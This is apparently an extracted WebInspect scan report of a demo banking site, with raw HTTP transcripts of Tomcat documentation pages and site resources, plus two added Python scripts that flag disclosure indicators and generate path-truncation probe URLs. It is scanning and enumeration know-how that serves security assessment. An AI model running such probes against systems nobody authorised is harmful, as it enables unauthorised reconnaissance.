name="Preface"><strong>Preface</strong></a></font></td></tr><tr><td><blockquote>
<p>This section of the Tomc
...TRUNCATED...
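The Tomcat documentation responses above share three traits worth flagging when triaging a scan like this: a Server banner, Access-Control-Allow-Origin: * on a static page, and a weak ETag in the form Tomcat's DefaultServlet uses, W/"<content-length>-<last-modified in epoch ms>", which discloses file size and modification time alongside the exact version string printed in the bundled docs. The following Python script is an added example written for this page, not WebInspect code and not part of the report; it parses a raw response transcript of the kind printed above and lists those indicators. The sample response is constructed from the /docs/architecture/index.html headers shown, with the body abridged to the fragments that carry the version.

```python
"""Flag information-disclosure indicators in a raw HTTP response transcript.

Added example for this report page; not WebInspect code. The transcript format is the
one printed in the report: status line, header lines, a blank line, then the body.
"""
import re
from email.utils import parsedate_to_datetime

# Tomcat's bundled docs print the container version in the page header.
TOMCAT_VERSION_RE = re.compile(r"Apache Tomcat.*?Version (\d+\.\d+\.\d+)", re.S)
# Tomcat's DefaultServlet builds weak validators as W/"<content-length>-<last-modified-ms>".
WEAK_ETAG_RE = re.compile(r'^W/"(\d+)-(\d+)"$')


def parse_response(raw):
    """Split a transcript into (status_line, headers, body).

    Header names are lower-cased; repeated headers are kept in order as a list.
    """
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = lines[0].strip()
    if not status.startswith("HTTP/"):
        raise ValueError("not an HTTP response transcript: %r" % status)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def etag_leaks_metadata(headers):
    """True when a weak ETag equals <Content-Length>-<Last-Modified in epoch ms>.

    That equality confirms the validator is derived from file size and mtime, so the
    header would keep disclosing both even if Last-Modified were later suppressed.
    """
    length = headers.get("content-length", [None])[0]
    last_modified = headers.get("last-modified", [None])[0]
    if length is None or last_modified is None:
        return False
    mtime = int(parsedate_to_datetime(last_modified).timestamp())
    for etag in headers.get("etag", []):
        m = WEAK_ETAG_RE.match(etag)
        if m and int(m.group(1)) == int(length) and int(m.group(2)) // 1000 == mtime:
            return True
    return False


def audit_response(raw):
    """Return a list of indicator tags found in the transcript, in a fixed order."""
    _status, headers, body = parse_response(raw)
    findings = []
    for banner in headers.get("server", []):            # e.g. Apache-Coyote/1.1 names the container
        findings.append("server-banner:" + banner)
    if "*" in headers.get("access-control-allow-origin", []):
        findings.append("cors-wildcard")                 # any origin may read this response
    m = TOMCAT_VERSION_RE.search(body)
    if m:
        findings.append("tomcat-version:" + m.group(1))  # exact version from bundled docs
    if etag_leaks_metadata(headers):
        findings.append("etag-leaks-size-and-mtime")
    return findings


# Constructed sample: the /docs/architecture/index.html headers from the report, body abridged
# to the two fragments that carry the version. The size check uses Content-Length, not len(body).
SAMPLE_TOMCAT_DOCS = """HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:54 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"7656-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 7656
Connection: Keep-Alive

<html><head><title>Apache Tomcat 7 Architecture (7.0.70) - Table of Contents</title></head>
<body><h1>Apache Tomcat 7</h1><font>Version 7.0.70, Jun 15 2016</font></body></html>
"""

if __name__ == "__main__":
    for tag in audit_response(SAMPLE_TOMCAT_DOCS):
        print(tag)
```

Run it against any of the report's transcripts after inserting the blank line between headers and body that the PDF extraction dropped; for the sample above it reports the banner, the wildcard CORS policy, version 7.0.70 and the metadata-bearing ETag, because 1466008846000 ms is exactly Wed, 15 Jun 2016 16:40:46 GMT and 7656 is the Content-Length.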

Page:

http://zero.webappsecurity.com:80/docs/appdev/

Request:
GET /docs/appdev/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="67BA648D12849829BE2910DD0EB52792";
PSID="16A0FCA95F27748B361F869AE08E40BF"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="91"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="5d5ef683-f82b-45d1-b014-8c6cbd824fa4";
X-Request-Memo: ID="f1eb2a48-1381-489c-b321-d295c5ae7b6c"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=943C3A6B
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:58:19 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"8650-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 8650
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Application Developer's
Guide (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}

div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
The Apache Tomcat Servlet/JSP Container
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">App Dev Guide Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Contents</strong></p><ul><li><a
href="index.html">Contents</a></li><li><a href="introduction.html">Introduction</a></li><li><a
href="installation.html">Installation</a></li><li><a href="deployment.html">Deployment</a></li><li><a
href="source.html">Source Code</a></li><li><a href="processes.html">Processes</a></li><li><a href="sample/">Example
App</a></li></ul></td><!--RIGHT SIDE MAIN BODY--><td width="80%" valign="top" align="left"
id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0" cellpadding="2"><tr><td
bgcolor="#525D76"><font color="#ffffff"
...TRUNCATED...
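The request above is WebInspect's Path Truncation check: it takes a crawled URL (the Referer, /docs/appdev/index.html) and asks for the enclosing directory to see whether the server lists it, serves a welcome file, redirects, or refuses. The script below is an added example, not the scanner's code or anything from the report; it generates the parent paths a truncation check would request for a URL and classifies a probe response. The sample responses are constructed from the report's transcripts for /docs/config/ versus /docs/config/index.html (same weak ETag, so the directory serves index.html) and for /bank/pay-bills.html (302 to login.html); the directory-listing sample is hypothetical, since no listing appears in the report, and uses the title Tomcat's DefaultServlet emits when listings are enabled.

```python
"""Path-truncation probing: request each parent directory of a crawled URL and classify
what the server returns.

Added example for this report page; not WebInspect's Path Truncation engine. Responses are
plain dicts {"status": int, "headers": {lower-case name: value}, "body": str} so the
classifier runs offline against the constructed samples below.
"""
from urllib.parse import urlsplit, urlunsplit

# Title Tomcat's DefaultServlet emits when directory listings are enabled (listings="true").
TOMCAT_LISTING_MARKER = "<title>Directory Listing For"


def truncation_candidates(url):
    """Parent-directory URLs to probe, nearest first; query and fragment are dropped.

    .../docs/appdev/index.html -> .../docs/appdev/, .../docs/, .../
    .../docs/appdev/           -> .../docs/, .../
    """
    parts = urlsplit(url)
    # Drop the last segment: the file name, or the directory itself when the path ends in "/".
    segments = [s for s in parts.path.split("/") if s][:-1]
    candidates = []
    for n in range(len(segments), -1, -1):
        path = "/" + "/".join(segments[:n]) + ("/" if n else "")
        candidates.append(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return candidates


def classify_directory_response(dir_resp, index_resp=None):
    """Say what a directory probe got back.

    "welcome-file" needs the index document's response too: a 200 whose ETag equals the
    index.html ETag means the container served the welcome file, which is what the report
    shows for /docs/config/ versus /docs/config/index.html.
    """
    status, headers = dir_resp["status"], dir_resp["headers"]
    if 300 <= status < 400:
        return "redirect:" + headers.get("location", "")   # e.g. bounced to a login page
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "absent"
    if status != 200:
        return "other:%d" % status
    if TOMCAT_LISTING_MARKER in dir_resp["body"]:
        return "directory-listing"                           # contents enumerable
    etag = headers.get("etag")
    if index_resp is not None and etag and etag == index_resp["headers"].get("etag"):
        return "welcome-file"
    return "content"                                         # 200 but not matched to the index


# Constructed samples, abridged from the report's transcripts (bodies shortened).
RESP_CONFIG_DIR = {"status": 200,
                   "headers": {"etag": 'W/"11131-1466008846000"', "content-length": "11131"},
                   "body": "<html><head><title>Apache Tomcat 7 Configuration Reference (7.0.70) - Overview</title>"}
RESP_CONFIG_INDEX = dict(RESP_CONFIG_DIR)                    # /docs/config/index.html: identical headers
RESP_PAY_BILLS = {"status": 302,
                  "headers": {"location": "http://zero.webappsecurity.com/login.html"},
                  "body": ""}
# Hypothetical: not observed in the report; shows what an enabled Tomcat listing would match.
RESP_LISTING = {"status": 200, "headers": {},
                "body": "<html><head><title>Directory Listing For /docs/</title></head></html>"}


def run_sample():
    """Classify the constructed samples; returns a dict keyed by short labels."""
    return {
        "config-dir": classify_directory_response(RESP_CONFIG_DIR, RESP_CONFIG_INDEX),
        "pay-bills": classify_directory_response(RESP_PAY_BILLS),
        "listing": classify_directory_response(RESP_LISTING),
    }


if __name__ == "__main__":
    for u in truncation_candidates("http://zero.webappsecurity.com/docs/appdev/index.html"):
        print("probe", u)
    for label, verdict in run_sample().items():
        print(label, verdict)
```

A "welcome-file" verdict on /docs/ is benign in itself but confirms the default Tomcat documentation web application is deployed; a "directory-listing" verdict is the finding the truncation engine is really hunting for, and "redirect:" to login.html is what an authorization-gated page such as /bank/pay-bills.html should return to an unauthenticated crawler.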

Page:

http://zero.webappsecurity.com:80/docs/config/

Request:
GET /docs/config/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/config/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="4F45282CDA6F3C357915B50276DEDC05";
PSID="7E09004C87348100F227487435CD3213"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="2d26bf82-99a6-4e3b-a0ef-717f11f60dd6";
X-Request-Memo: ID="0d59271e-0338-4447-b9d4-b1158fac3334"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=02B64950
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:12 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"11131-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 11131
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tomcat 7
Configuration Reference (7.0.70) - Overview</title><meta name="author" content="Craig R. McClanahan"><style
type="text/css" media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
The Apache Tomcat Servlet/JSP Container
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">Config Ref. Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Top Level Elements</strong></p><ul><li><a
href="server.html">Server</a></li><li><a
href="service.html">Service</a></li></ul><p><strong>Executors</strong></p><ul><li><a
href="executor.html">Executor</a></li></ul><p><strong>Connectors</strong></p><ul><li><a
href="http.html">HTTP</a></li><li><a
href="ajp.html">AJP</a></li></ul><p><strong>Containers</strong></p><ul><li><a
href="context.html">Context</a></li><li><a href="engine.html">Engine</a></li><li><a
href="host.html">Host</a></li><li><a href="cluster.html">Cluster</a></li></ul><p><strong>Nested
Components</strong></p><ul
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/search.html?searchTerm=12345

Request:
GET /search.html?searchTerm=12345 HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="4FB1E28C3A3C661502F583F3EA8F6277";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Form"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="action"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="282";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="47285469-80aa-457f-b7a7-463caf37d211";
X-Request-Memo: ID="7c5328cd-1699-4712-b23e-8d196c922a1c"; sc="1"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:12 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 7710

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - Search Tips</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
<div>
<ul class="nav float-right">
<li> <form action="/search.html"
class="navbar-search pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>
<button id="signin_button" type="button" class="signin btn btn-info">
<i class="icon-signin"></i>Signin
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
<script type="text/javascript">
$(function() {
var path = "/";
$("#signin_button").click(function(event) {
event.preventDefault();
window.location.href = path + "login" + ".html";
});
});
</script>
<div class="container">
<div class="top_offset">
<div class="row">
<div class="span12">
<div id="nav" class="clearfix">
<ul id="pages-nav">
<li id="homeMenu"><div><strong>Home</strong></div></li>
<li id="onlineBankingMenu"><div><strong>Online Banking</strong></div></li>
<li id="feedback"><div><strong>Feedback</strong></div></li>
</ul>
</div>
</div>
<script type="text/javascript">
$(function () {
var path = "/";
var featureIdToName = {
"index": "homeMenu",
"online-banking": "onlineBankingMenu",
"feedback": "feedback"
};
if (document.location.href.match(".*" + path + "$") != null) {
$("#homeMenu").addClass("active");
} else {
$.each(featureIdToName, function(featureId, featureName) {
if (document.location.href.indexOf(featureId + ".html") >= 0) {
$("#" + featureName).addClass("active");
}
});
}
$.each(featureIdToName, function(featureId, featureName) {
$("
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/resources/js/placeholders.min.js

Request:
GET /resources/js/placeholders.min.js HTTP/1.1
Referer: http://zero.webappsecurity.com/
Host: zero.webappsecurity.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-AscRawUrl: /resources/js/placeholders.min.js
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="511D6DB521E43A071D015EA7E62869D3";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="ScriptInclude"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="216"; ThreadType="JScriptEvent";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="6b3b66bc-ee7e-418f-a2ff-72824c2c8770";
X-Request-Memo: ID="ba10ebcc-36c7-4b8b-a7d2-a65d07b35ed5"; sc="1"; ThreadId="216";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:31 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"5615-1360116138000"
Last-Modified: Wed, 06 Feb 2013 02:02:18 GMT
Cache-Control: max-age=2678400
Expires: Thu, 10 Nov 2016 07:50:31 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 5615
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
var Placeholders=function(){var validTypes=["text","search","url","tel","email","password","number","textarea"],settings=
{live:false,hideOnFocus:false,className:"placeholderspolyfill",textColor:"#999",styleImportant:true},badKeys=
[37,38,39,40],interval,valueKeyDown,classNameRegExp=new RegExp("\\b"+settings.className+"\\b");function cursorToStart
(elem){var range;if(elem.createTextRange){range=elem.createTextRange();range.move("character",0);range.select()}else if
(elem.selectionStart){elem.focus();
elem.setSelectionRange(0,0)}}function focusHandler(){var type;if(this.value===this.getAttribute("placeholder"))if(!
settings.hideOnFocus)cursorToStart(this);else{this.className=this.className.replace
(classNameRegExp,"");this.value="";type=this.getAttribute("data-placeholdertype");if(type)this.type=type}}function blurHandler()
{var type;if(this.value===""){this.className=this.className+" "+settings.className;this.value=this.getAttribute
("placeholder");type=this.getAttribute("data-placeholdertype");if(type)this.type=
"text"}function submitHandler(){var inputs=this.getElementsByTagName

("input"),textareas=this.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,element,placeholder,i;for(i=0;i<num;i+=1)
{element=i<numInputs?inputs[i]:textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if
(element.value===placeholder)element.value=""}}function keydownHandler(event)
{valueKeyDown=this.value;return!(valueKeyDown===this.getAttribute("placeholder")&&badKeys.indexOf
(event.keyCode)>
-1)}function keyupHandler(){var type;if(this.value!==valueKeyDown){this.className=this.className.replace
(classNameRegExp,"");this.value=this.value.replace(this.getAttribute("placeholder"),"");type=this.getAttribute
("data-placeholdertype");if(type)this.type=type}if(this.value===""){blurHandler.call(this);cursorToStart(this)}}
function addEventListener(element,event,fn){if(element.addEventListener)return element.addEventListener
(event,fn.bind(element),false);if(element.attachEvent)return element.attachEvent("on"+
event,fn.bind(element))}function addEventListeners(element){if(!settings.hideOnFocus){addEventListener
(element,"keydown",keydownHandler);addEventListener(element,"keyup",keyupHandler)}addEventListener
(element,"focus",focusHandler);addEventListener(element,"blur",blurHandler)}function updatePlaceholders(){var
inputs=document.getElementsByTagName("input"),textareas=document.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,form,element,oldPlaceholder,newPlaceholder;
for(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:textareas[i-numInputs];newPlaceholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.type)>-1)if
(newPlaceholder){oldPlaceholder=element.getAttribute("data-currentplaceholder");if(newPlaceholder!
==oldPlaceholder){if(element.value===oldPlaceholder||element.value===newPlaceholder||!element.value)
{element.value=newPlaceholder;element.className=element.className+" "+settings.className}if(!
oldPlaceholder){if(element.form){form=element.form;
if(!form.getAttribute("data-placeholdersubmit")){addEventListener
(form,"submit",submitHandler);form.setAttribute("data-placeholdersubmit","true")}}addEventListeners(element)}
element.setAttribute("data-currentplaceholder",newPlaceholder)}}}}function createPlaceholders(){var
inputs=document.getElementsByTagName("input"),textareas=document.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,element,form,placeholder;for
(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:
textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.typ
...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/config/index.html

Request:
GET /docs/config/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="7E09004C87348100F227487435CD3213";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4b07bdfd-5bf9-4978-ba7e-148d40b25b6c";
X-Request-Memo: ID="14650510-0176-4a7f-b96f-425b7b8c369e"; sc="2"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5

Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:46 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"11131-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 11131
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tomcat 7
Configuration Reference (7.0.70) - Overview</title><meta name="author" content="Craig R. McClanahan"><style
type="text/css" media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
The Apache Tomcat Servlet/JSP Container
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
